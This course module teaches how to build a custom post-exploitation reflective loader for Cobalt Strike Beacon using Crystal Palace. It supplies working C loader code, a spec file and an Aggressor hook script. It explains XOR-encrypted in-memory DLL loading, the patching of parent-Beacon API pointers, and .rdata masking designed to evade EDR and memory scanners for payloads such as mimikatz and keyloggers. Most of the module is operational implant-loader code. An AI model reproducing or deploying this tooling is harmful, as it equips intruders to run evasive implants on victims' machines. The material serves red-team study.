Module 7: Post-Ex UDRL & Aggressor Integration
The postex loader, $GMH/$GPA patching, string-based DFR, Aggressor hooks, and the complete build pipeline from C source to deployed Beacon.
Module Objective
Understand how Cobalt Strike's post-exploitation DLLs are loaded by a separate, simplified UDRL. You will learn how the postex loader differs from the Beacon UDRL, how it receives API resolution capabilities from its parent Beacon via $GMH/$GPA patching, and how the Aggressor script ties the entire Crystal-Loaders system together. By the end of this module you will be able to trace a complete payload from C source through Crystal Palace to a running Beacon on target.
1. What Is Post-Ex?
Cobalt Strike's post-exploitation capabilities — mimikatz, screenshot, keylogger, port scan, hashdump, net commands, and many others — are implemented as standalone DLLs. When an operator runs one of these commands through the Beacon console, Cobalt Strike compiles or selects the appropriate postex DLL and sends it to the running Beacon for execution.
These postex DLLs need their own loader. The initial Beacon UDRL (covered in Modules 5 and 6) loads the Beacon implant itself, but every subsequent postex capability that arrives as a DLL also needs to be reflectively loaded into memory. Cobalt Strike provides a dedicated hook for this purpose: POSTEX_RDLL_GENERATE.
Why a Separate Loader?
The postex loader is architecturally simpler than the Beacon UDRL because it operates in a fundamentally different context. The Beacon is already running, API resolution is already solved, syscall stubs are already resolved, and the BUD (Beacon User Data) is already populated. The postex loader does not need to bootstrap any of this infrastructure — it inherits resolution capabilities from its parent Beacon via function pointer patching.
Key Distinction
The POSTEX_RDLL_GENERATE Aggressor hook allows operators to replace the default postex loader with a custom one — just as BEACON_RDLL_GENERATE allows replacing the Beacon's own loader. Crystal-Loaders provides both: a full-featured Beacon UDRL and a streamlined postex UDRL, each with its own spec file and C source.
2. Key Differences from the Beacon UDRL
The postex loader shares the same Crystal Palace build system and LibTCG PE loading primitives as the Beacon UDRL, but it strips away everything that the parent Beacon already provides. The following table highlights every architectural difference:
| Aspect | Beacon UDRL (loader.c) | Post-Ex UDRL (loader.c) |
|---|---|---|
| Includes | beacon.h, gate.h, tcg.h | tcg.h only |
| Syscall resolution | Full SYSCALL_API via LibGate | None needed |
| DFR method | ror13 (hash-based) | strings (ASCII name-based) |
| API resolution | PEB walking via findModuleByHash | $GMH/$GPA from parent Beacon |
| BUD population | Full BEACON_USER_DATA | None |
| Entry params | go() takes no args | go(void* loaderArguments) |
| DllMain calls | 3 (BEACON_USER_DATA, ATTACH, START) | 2 (ATTACH, START) |
| Memory tracking | ALLOCATED_MEMORY_REGION | RDATA_SECTION |
| Section masking | Full section tracking | .rdata capture only |
The most striking reduction is in dependencies. The Beacon UDRL includes beacon.h (for BUD structures), gate.h (for LibGate syscalls), and tcg.h (for PE loading). The postex loader only needs tcg.h because it does not resolve syscalls and does not populate BUD. It is purely a PE loading engine with inherited API resolution.
Why This Matters for Evasion
A smaller loader means a smaller PIC blob, which means less code in memory to scan, fewer function calls to trace, and a reduced detection surface. The postex loader also avoids touching the PEB directly (it uses patched-in function pointers instead of PEB walking), which sidesteps PEB access monitoring that some EDR products implement.
3. The $GMH / $GPA Patching Mechanism
The central design question for the postex loader is: how does it resolve Windows API functions without PEB walking and without LibGate? The answer is function pointer patching. The parent Beacon already has resolved addresses for GetModuleHandleA and GetProcAddress. Crystal Palace writes those addresses directly into the postex loader's code before it executes.
Global Function Pointers in .text
The postex loader.c declares two global function pointers with an unusual attribute — they are placed in the .text section instead of .data:
C (postex/loader.c)
// Global function pointers stored in .text section
__typeof__(GetModuleHandleA) * pGetModuleHandle __attribute__((section(".text")));
__typeof__(GetProcAddress) * pGetProcAddress __attribute__((section(".text")));
Placing them in .text is deliberate. After Crystal Palace transforms the COFF object into PIC, the .text section becomes the executable code body. By placing the pointers here, they become part of the PIC blob itself — directly addressable via RIP-relative instructions. If they were in .data, Crystal Palace would need to handle an additional data section and relocations.
The patch Directive
The postex spec file uses Crystal Palace's patch directive to write values into these symbol locations:
loader.spec (postex)
name "Beacon Postex Loader"
describe "PIC loader for Cobalt Strike's postex DLLs"
author "Daniel Duggan (@_RastaMouse)"
x64:
    load "bin/loader.x64.o"
    make pic +gofirst +optimize +disco
    dfr "resolve" "strings"
    patch "pGetModuleHandle" $GMH
    patch "pGetProcAddress" $GPA
    mergelib "../libtcg.x64.zip"
    generate $KEY 128
    push $DLL
    xor $KEY
    preplen
    link "dll"
    push $KEY
    preplen
    link "key"
    export
The $GMH and $GPA variables are not defined in the spec itself. They are provided externally by the Aggressor script at runtime, which receives them from Cobalt Strike as parameters to the POSTEX_RDLL_GENERATE hook. Crystal Palace resolves the symbol names "pGetModuleHandle" and "pGetProcAddress" in the COFF object's symbol table and overwrites those locations with the 8-byte addresses provided by $GMH and $GPA.
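To make the patch step concrete, here is a minimal, portable sketch of what "overwrite a symbol's location with an 8-byte address" amounts to. It is not Crystal Palace's implementation: `patch_symbol`, `read_symbol`, the blob, and the symbol offset are hypothetical names chosen for illustration, and the sketch assumes the value is stored little-endian, as x64 code expects.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: overwrite 8 bytes of a code blob at a known
 * symbol offset with a 64-bit address, least significant byte first.
 * Returns 0 on success, -1 if the write would run past the blob. */
static int patch_symbol(uint8_t *blob, size_t blob_len,
                        size_t sym_offset, uint64_t address)
{
    if (sym_offset > blob_len || blob_len - sym_offset < 8)
        return -1;
    for (int i = 0; i < 8; i++)
        blob[sym_offset + i] = (uint8_t)(address >> (8 * i));
    return 0;
}

/* Hypothetical helper: read the 8-byte value back, byte by byte, so the
 * result does not depend on the endianness of the machine running it. */
static uint64_t read_symbol(const uint8_t *blob, size_t sym_offset)
{
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | blob[sym_offset + i];
    return v;
}
```

In the real pipeline the offset comes from the COFF symbol table and the value from the hook parameters. The sketch only shows that the pointer becomes ordinary bytes inside the blob.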
[Figure: $GMH / $GPA Patching Flow. Stages: has resolved GMH/GPA → passes to Aggressor hook → patch directive → pointers baked in .text]
Comparing Spec Directives: Beacon vs Post-Ex
| Directive | Beacon Spec | Post-Ex Spec |
|---|---|---|
| dfr | "resolve" "ror13" | "resolve" "strings" |
| patch | Not used | patch "pGetModuleHandle" $GMH; patch "pGetProcAddress" $GPA |
| mergelib | LibGate + LibTCG | LibTCG only |
4. The Post-Ex resolve() Function
Because the postex spec uses dfr "resolve" "strings", Crystal Palace rewrites all __imp_MODULE$Function references to call resolve() with ASCII string arguments instead of ROR13 hashes. The postex resolve() function is correspondingly different from the Beacon UDRL's version:
C (postex/loader.c)
char * resolve(char * module, char * function)
{
    HANDLE hModule = pGetModuleHandle(module);
    if (hModule == NULL)
        hModule = LoadLibraryA(module);
    return pGetProcAddress(hModule, function);
}
This function is deceptively simple, but every line is significant:
Line-by-Line Analysis
| Line | What It Does |
|---|---|
| pGetModuleHandle(module) | Attempts to get a handle to the module using the patched $GMH pointer. This succeeds if the DLL is already loaded in the process (e.g., kernel32.dll, ntdll.dll). |
| if (hModule == NULL) | If the module is not already loaded, the function needs to load it first. This happens when postex DLLs import from less common DLLs. |
| LoadLibraryA(module) | Calls LoadLibraryA directly to load the module. This is available as a plain function call because it comes from <windows.h> and is not DFR-decorated. |
| pGetProcAddress(hModule, function) | Finally resolves the target function from the (now loaded) module and returns its address. |
Comparison with Beacon UDRL resolve()
Beacon UDRL resolve()
- Takes two DWORD hashes (ROR13)
- Walks the PEB's InMemoryOrderModuleList
- Hashes each module name, compares against moduleHash
- Walks export table, hashes each function name
- No dependency on any external function pointers
- Fully self-contained: works from a cold start
Post-Ex resolve()
- Takes two ASCII strings (module name, function name)
- Calls pGetModuleHandle (patched $GMH)
- Falls back to LoadLibraryA (direct call, not DFR-decorated) if module not loaded
- Calls pGetProcAddress (patched $GPA)
- Depends on parent Beacon's function pointers
- Cannot operate independently: requires a running Beacon
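The control flow of the Post-Ex resolve() (look up, fall back to loading, then resolve) can be exercised off-target with stand-in functions. The sketch below is an illustration only: `resolver_t`, `resolve_by_name`, and the three `mock_*` functions are hypothetical, no Windows API is called, and the extra NULL check after the fallback is an addition that the original function does not have.

```c
#include <stddef.h>
#include <string.h>

typedef void *(*get_module_fn)(const char *name);
typedef void *(*get_proc_fn)(void *module, const char *name);

/* Stand-ins for the two patched pointers and the load fallback. */
typedef struct {
    get_module_fn get_module;   /* role of pGetModuleHandle */
    get_module_fn load_module;  /* role of LoadLibraryA     */
    get_proc_fn   get_proc;     /* role of pGetProcAddress  */
} resolver_t;

static void *resolve_by_name(const resolver_t *r,
                             const char *module, const char *function)
{
    void *h = r->get_module(module);    /* already loaded? */
    if (h == NULL)
        h = r->load_module(module);     /* fallback: load it */
    if (h == NULL)
        return NULL;                    /* guard added in this sketch */
    return r->get_proc(h, function);
}

/* Mocks: one module is "already loaded", one loads on demand. */
static int load_calls;

static void *mock_get_module(const char *n)
{
    return strcmp(n, "already.dll") == 0 ? (void *)"A" : NULL;
}

static void *mock_load_module(const char *n)
{
    load_calls++;
    return strcmp(n, "ondemand.dll") == 0 ? (void *)"B" : NULL;
}

static void *mock_get_proc(void *m, const char *f)
{
    (void)f;
    return m;   /* any non-NULL value is enough for the demonstration */
}
```

Counting calls to the load mock makes the dependency visible: the fallback runs only when the first lookup misses.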
5. RDATA_SECTION Tracking
The Beacon UDRL tracks all allocated memory regions via ALLOCATED_MEMORY_REGION structures in the BUD. The postex loader uses a simpler tracking mechanism: it captures only the .rdata section's location and size.
C (postex/loader.c)
typedef struct {
    char * start;   // Start address of .rdata
    DWORD length;   // Size of .rdata
    DWORD offset;   // Offset of IAT within .rdata
} RDATA_SECTION;
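As a reading aid for the three fields, the following portable sketch derives the IAT address from start and offset and rejects an offset that falls outside the section. The type `rdata_section_t` mirrors the struct above with fixed-width integers, and both helper functions are hypothetical; nothing here is taken from the loader's source.

```c
#include <stddef.h>
#include <stdint.h>

/* Portable mirror of the RDATA_SECTION fields (DWORD -> uint32_t). */
typedef struct {
    char    *start;   /* start address of .rdata      */
    uint32_t length;  /* size of .rdata in bytes      */
    uint32_t offset;  /* offset of IAT within .rdata  */
} rdata_section_t;

/* Address of the IAT inside .rdata, or NULL if the recorded
 * offset does not fall inside the section. */
static char *rdata_iat(const rdata_section_t *r)
{
    if (r == NULL || r->start == NULL || r->offset >= r->length)
        return NULL;
    return r->start + r->offset;
}

/* Number of bytes from the IAT to the end of the section. */
static uint32_t rdata_bytes_after_iat(const rdata_section_t *r)
{
    return rdata_iat(r) != NULL ? r->length - r->offset : 0;
}
```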
Why Track .rdata?
Long-running postex DLLs — such as the keylogger, screenshot capture loop, or port scanner — persist in memory for extended periods. While they are idle between operations, their memory is vulnerable to scanning. The .rdata section is the highest-value forensic target because it contains:
What Lives in .rdata
- The Import Address Table (IAT): An array of resolved function pointers to APIs in ntdll.dll, kernel32.dll, and other system DLLs. These pointers are recognizable patterns: consecutive addresses within the same DLL's export range.
- String literals: Read-only strings used by the postex DLL (error messages, format strings, registry key paths).
- Virtual function tables: For C++ postex DLLs, vtable pointers reside in .rdata.
- Constant data: Any const global data the compiler places in read-only sections.
The loader passes the RDATA_SECTION structure to the postex DLL as the third (reserved) argument of DllMain on DLL_PROCESS_ATTACH. With the section's address and size in hand, the DLL can mask its own .rdata section while idle, for example by XOR-encrypting it. When it needs to run again, it decrypts the section, performs its operation, and re-encrypts. This pattern is the postex equivalent of the sleep mask technique used by the Beacon itself.
[Figure: RDATA Obfuscation Lifecycle. Stages: .rdata populated with IAT → keylogger cycle done → using RDATA_SECTION info → no readable IAT in memory]
6. The Post-Ex go() Function
The postex go() function is the entry point of the PIC blob. Crystal Palace places it at byte offset 0 via the +gofirst flag. Unlike the Beacon UDRL's go() (which takes no arguments), the postex version receives a loaderArguments pointer from the parent Beacon:
C (postex/loader.c)
void go(void * loaderArguments)
{
    RESOURCE * dll = (RESOURCE *)GETRESOURCE(_DLL_);
    RESOURCE * key = (RESOURCE *)GETRESOURCE(_KEY_);

    // XOR unmask the encrypted postex DLL
    char * src = KERNEL32$VirtualAlloc(
        NULL, dll->length, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    for (DWORD i = 0; i < dll->length; i++)
        src[i] = dll->value[i] ^ key->value[i % key->length];

    // Parse the decrypted PE
    DLLDATA data;
    ParseDLL(src, &data);

    // Allocate and load sections
    IMPORTFUNCS funcs;
    DWORD size = SizeOfDLL(&data);
    char * dst = KERNEL32$VirtualAlloc(
        NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    LoadDLL(&data, dst);
    ProcessImports(&funcs, &data, dst);

    // Fix permissions and capture .rdata info
    RDATA_SECTION rdata;
    FixSectionPermissions(&data, dst, &rdata);

    // Get entry point and clean up decryption buffer
    DLLMAIN_FUNC entryPoint = (DLLMAIN_FUNC)EntryPoint(&data, dst);
    KERNEL32$VirtualFree(src, 0, MEM_RELEASE);

    // Two DllMain calls (no USER_DATA needed)
    entryPoint((HINSTANCE)dst, DLL_PROCESS_ATTACH, &rdata);         // pass rdata info
    entryPoint((HINSTANCE)GETRESOURCE(go), 0x04, loaderArguments);  // start with loader args
}
Each phase of this function maps directly to a stage in the loading process:
Phase-by-Phase Breakdown
| Phase | Lines | What Happens |
|---|---|---|
| Resource Retrieval | GETRESOURCE | The _DLL_ and _KEY_ macros resolve to named sections that Crystal Palace linked into the PIC blob. GETRESOURCE uses RIP-relative addressing to locate them. |
| XOR Decryption | VirtualAlloc + XOR loop | Allocates a RW buffer (src) and decrypts the postex DLL using a rolling XOR with the 128-byte key. The decrypted buffer is a raw PE file. |
| PE Parsing | ParseDLL | LibTCG parses the PE headers, section table, import directory, and relocation table into a DLLDATA structure. |
| Section Loading | SizeOfDLL + VirtualAlloc + LoadDLL | go() allocates the final image region (RW, sized by SizeOfDLL), and LoadDLL copies each PE section to its correct virtual address offset within it. |
| Import Resolution | ProcessImports | Takes an IMPORTFUNCS struct, the DLLDATA, and dst. Walks the import directory and resolves each function using the DFR-rewritten resolve(), which delegates to the patched $GMH/$GPA. |
| Permission Fixing | FixSectionPermissions | Sets correct page protections for each section (.text to RX, .rdata to R, .data to RW). Captures .rdata boundaries into the RDATA_SECTION struct. |
| Cleanup | VirtualFree | Releases the temporary decryption buffer (src). The raw decrypted PE it held is no longer needed once its sections have been copied into dst. |
| DllMain #1 | DLL_PROCESS_ATTACH | Calls the postex DLL's entry point with (HINSTANCE)dst and &rdata as the reserved parameter, giving it the information needed for .rdata obfuscation. |
| DllMain #2 | 0x04 | Calls DllMain again with reason 0x04, passing (HINSTANCE)GETRESOURCE(go) as the module handle and loaderArguments from the parent Beacon, starting the actual postex operation (mimikatz dump, screenshot capture, etc.). |
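The XOR decryption phase and the length-prefixed resources it reads can be tried in isolation. The sketch below is a portable illustration under stated assumptions: `resource_t` assumes that preplen yields a 4-byte length followed by the payload bytes, and `make_resource` and `xor_with_key` are hypothetical helpers. It uses malloc instead of VirtualAlloc so it runs on any platform, and it adds a zero-length-key guard that the loader code does not show.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Assumed layout of a length-prefixed resource: a 4-byte length
 * followed immediately by the payload bytes. */
typedef struct {
    uint32_t length;
    uint8_t  value[];
} resource_t;

/* Build a resource from raw bytes (caller frees the result). */
static resource_t *make_resource(const uint8_t *data, uint32_t len)
{
    resource_t *r = malloc(sizeof *r + len);
    if (r == NULL)
        return NULL;
    r->length = len;
    memcpy(r->value, data, len);
    return r;
}

/* XOR src with a repeating key into dst. The operation is its own
 * inverse: applying it twice with the same key restores the input. */
static void xor_with_key(uint8_t *dst, const uint8_t *src, uint32_t len,
                         const resource_t *key)
{
    if (key == NULL || key->length == 0) {  /* guard added in this sketch */
        memmove(dst, src, len);
        return;
    }
    for (uint32_t i = 0; i < len; i++)
        dst[i] = src[i] ^ key->value[i % key->length];
}
```

Because the key index wraps with `i % key->length`, a 128-byte key repeats every 128 bytes of payload. The same loop therefore serves for both masking at link time and unmasking in go().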
Contrast with Beacon UDRL go()
The Beacon UDRL's go() function makes three DllMain calls:
Beacon UDRL: Three DllMain Calls
- entryPoint((HINSTANCE)0, DLL_BEACON_USER_DATA, &bud): passes the BEACON_USER_DATA structure using the special DLL_BEACON_USER_DATA reason code and (HINSTANCE)0 as the module handle
- entryPoint((HINSTANCE)dst, DLL_PROCESS_ATTACH, NULL): standard DLL initialization with the actual loaded image base
- entryPoint((HINSTANCE)GETRESOURCE(go), DLL_BEACON_START, NULL): starts the Beacon main loop
The postex loader skips the first call entirely because there is no BEACON_USER_DATA to pass. Postex DLLs do not need syscall stubs or memory region tracking — they operate within the context of an already-running Beacon that handles those concerns.
7. The Aggressor Script (crystalpalace.cna)
The Aggressor script is the glue that connects Crystal Palace to Cobalt Strike's runtime. It implements the hooks that Cobalt Strike calls when it needs to generate loader payloads, passing the appropriate parameters to the Crystal Palace linker.
Java/Sleep (crystalpalace.cna)
import crystalpalace.spec.* from: crystalpalace.jar;
import java.util.HashMap;

set BEACON_RDLL_GENERATE {
    local('$spec $spec_path $result');
    # $1 = filename, $2 = beacon DLL bytes, $3 = arch
    if ($3 eq "x86") { return $null; }  # x64 only
    $spec_path = getFileProper(script_resource("udrl"), "loader.spec");
    $spec = [LinkSpec Parse: $spec_path];
    $result = [$spec run: $2, [new HashMap]];
    if (strlen($result) == 0) {
        warn("Crystal Palace: BEACON_RDLL_GENERATE failed");
        return $null;
    }
    return $result;
}

set BEACON_RDLL_SIZE {
    return "0";  # dynamic size
}

set POSTEX_RDLL_GENERATE {
    local('$spec $spec_path $hashMap $result');
    # $1 = filename, $2 = postex DLL bytes, $3 = arch
    # $4 = beacon ID, $5 = $GMH, $6 = $GPA
    if ($3 eq "x86") { return $null; }
    $spec_path = getFileProper(script_resource("postex-udrl"), "loader.spec");
    $spec = [LinkSpec Parse: $spec_path];
    $hashMap = [new HashMap];
    [$hashMap put: "\$GMH", cast($5, 'b')];
    [$hashMap put: "\$GPA", cast($6, 'b')];
    $result = [$spec run: $2, $hashMap];
    if (strlen($result) == 0) {
        warn("Crystal Palace: POSTEX_RDLL_GENERATE failed");
        return $null;
    }
    return $result;
}
The three hooks each serve a distinct purpose in the payload generation pipeline. Note that in Cobalt Strike's Sleep language, the set keyword assigns named hook callbacks (such as RDLL hooks), while on registers event handlers — these are different mechanisms. The import java.util.HashMap at the top makes the Java HashMap class available for passing patch variables.
BEACON_RDLL_GENERATE
Hook: BEACON_RDLL_GENERATE
When it fires: Every time Cobalt Strike generates a Beacon payload (HTTP listener, HTTPS listener, SMB pipe, etc.).
Parameters received:
- $1: The filename hint (e.g., "beacon.dll")
- $2: The raw Beacon DLL bytes (the PE file that needs to be loaded)
- $3: The architecture string ("x86" or "x64")
What it does: Uses getFileProper to construct the spec file path and calls LinkSpec Parse to load the Beacon UDRL spec. Feeds it the Beacon DLL bytes (which become $DLL in the spec) and returns the complete PIC payload. The new HashMap is empty because the Beacon spec has no external variables to patch. Includes error handling: if the result has strlen() == 0, a warn() fallback fires and $null is returned.
Return value: The final PIC shellcode blob, or $null if the architecture is x86 (Crystal-Loaders is x64-only) or if Crystal Palace fails.
BEACON_RDLL_SIZE
Hook: BEACON_RDLL_SIZE
When it fires: Before BEACON_RDLL_GENERATE, to determine how much space to reserve for the loader.
Return value: "0" indicates that no fixed loader size is reserved. Cobalt Strike documents "0", "5", and "100" as the valid values for this hook, where "0" requests a Beacon DLL with no reflective-loader space set aside inside it. Crystal Palace determines the exact size at link time based on the code, libraries, and encrypted payload, so Cobalt Strike accepts whatever size Crystal Palace produces.
POSTEX_RDLL_GENERATE
Hook: POSTEX_RDLL_GENERATE
When it fires: Every time an operator runs a postex command (mimikatz, screenshot, keylogger, etc.) that requires loading a DLL into the Beacon process.
Parameters received:
- $1: The filename hint (e.g., "mimikatz.dll")
- $2: The raw postex DLL bytes
- $3: The architecture string
- $4: The parent Beacon's ID (integer)
- $5: The parent Beacon's GetModuleHandleA address ($GMH)
- $6: The parent Beacon's GetProcAddress address ($GPA)
What it does: Uses getFileProper to construct the spec file path and calls LinkSpec Parse to load the postex spec. Constructs a HashMap containing $GMH and $GPA as byte arrays (via cast($5, 'b')), and passes both the DLL bytes and the hash map to Crystal Palace. The patch directives in the spec resolve $GMH and $GPA from this hash map. Includes error handling: if the result has strlen() == 0, a warn() fallback fires and $null is returned.
Return value: The complete postex PIC payload with patched-in function pointers, or $null on failure.
The HashMap is the Bridge
The key insight is how data flows from Cobalt Strike through Aggressor into Crystal Palace. The $GMH and $GPA values originate from the running Beacon on the target machine. Cobalt Strike resolves them from Beacon's process context, passes them as parameters to the Aggressor hook, and the script packages them into a HashMap that Crystal Palace reads when processing patch directives. By the time the PIC blob is assembled, the correct function addresses are baked directly into the shellcode's .text section.
8. The Full Build Pipeline
From writing C source code to a running Beacon on target, the Crystal-Loaders system involves eight distinct stages. The following diagram traces the complete pipeline:
Complete Crystal-Loaders Build Pipeline
Step 1: loader.c with go() entry point, resolve() function, and PE loading logic using LibTCG primitives.
Step 2: x86_64-w64-mingw32-gcc -c loader.c -o bin/loader.x64.o produces a COFF object file. The -c flag stops before linking.
Step 3: loader.spec defining the PIC transformation, DFR method, library merges, payload encryption, and data linking.
Step 4: Cobalt Strike fires BEACON_RDLL_GENERATE (or POSTEX_RDLL_GENERATE), passing the raw DLL bytes and architecture info to the Aggressor script.
Step 5: The .cna script calls LinkSpec Parse to load and parse the spec file, preparing the Crystal Palace linker engine.
Crystal Palace Sub-Operations (Step 6)
| Sub-Step | Operation | Result |
|---|---|---|
| 6a | Load loader.x64.o | COFF object loaded into linker memory |
| 6b | make pic +gofirst +optimize +disco | COFF transformed to PIC with go() at offset 0 |
| 6c | dfr "resolve" "ror13" (or "strings") | All DLL import references rewritten to call resolve() |
| 6d | mergelib LibGate + LibTCG (or LibTCG only) | Library code merged into the PIC blob |
| 6e | generate $KEY 128 | 128-byte random XOR key created |
| 6f | push $DLL / xor / preplen / link | DLL XOR-encrypted, length-prefixed, linked as named section |
[...] go()). The loader decrypts the embedded DLL, loads it via LibTCG, resolves imports via DFR, and calls DllMain to start Beacon.
Pipeline Summary
The pipeline transforms human-readable C code into a flat, encrypted, position-independent shellcode blob that loads a full-featured DLL implant from memory. A complete raw PE file exists in the target process's memory only briefly: the DLL is encrypted inside the PIC blob, decrypted into a temporary buffer, loaded section-by-section into a final allocation, and the temporary buffer is then freed. The only persistent artifacts are the PIC code itself (which has no PE headers) and the loaded DLL sections (which have correct per-section permissions instead of a single RWX blob).
Module 7 Knowledge Check
Q1: How does the postex loader resolve Windows API functions?
It uses two global function pointers (pGetModuleHandle and pGetProcAddress) in the .text section. Crystal Palace's patch directive writes the parent Beacon's GetModuleHandleA ($GMH) and GetProcAddress ($GPA) addresses into these locations at link time. The postex resolve() function then uses these patched pointers to resolve all API imports. No PEB walking or syscalls are needed.
Q2: What Aggressor hook handles Beacon UDRL generation?
BEACON_RDLL_GENERATE fires every time Cobalt Strike generates a Beacon payload. It receives the raw Beacon DLL bytes, architecture string, and filename hint. The Aggressor script loads the Beacon UDRL spec file and returns the Crystal Palace PIC output. POSTEX_RDLL_GENERATE handles postex DLL loading, BEACON_RDLL_SIZE reports the loader size, and ARTIFACT_GENERATE is a different hook for artifact packaging.
Q3: Why does the postex loader track RDATA_SECTION instead of full ALLOCATED_MEMORY?
The .rdata section contains the resolved Import Address Table (IAT), which holds function pointers that memory scanners can identify as evidence of a loaded PE. By tracking the .rdata section's start address, size, and IAT offset via the RDATA_SECTION structure, the postex DLL can XOR-encrypt its own .rdata while idle and decrypt it only when actively executing, similar to how the Beacon's sleep mask protects its own memory.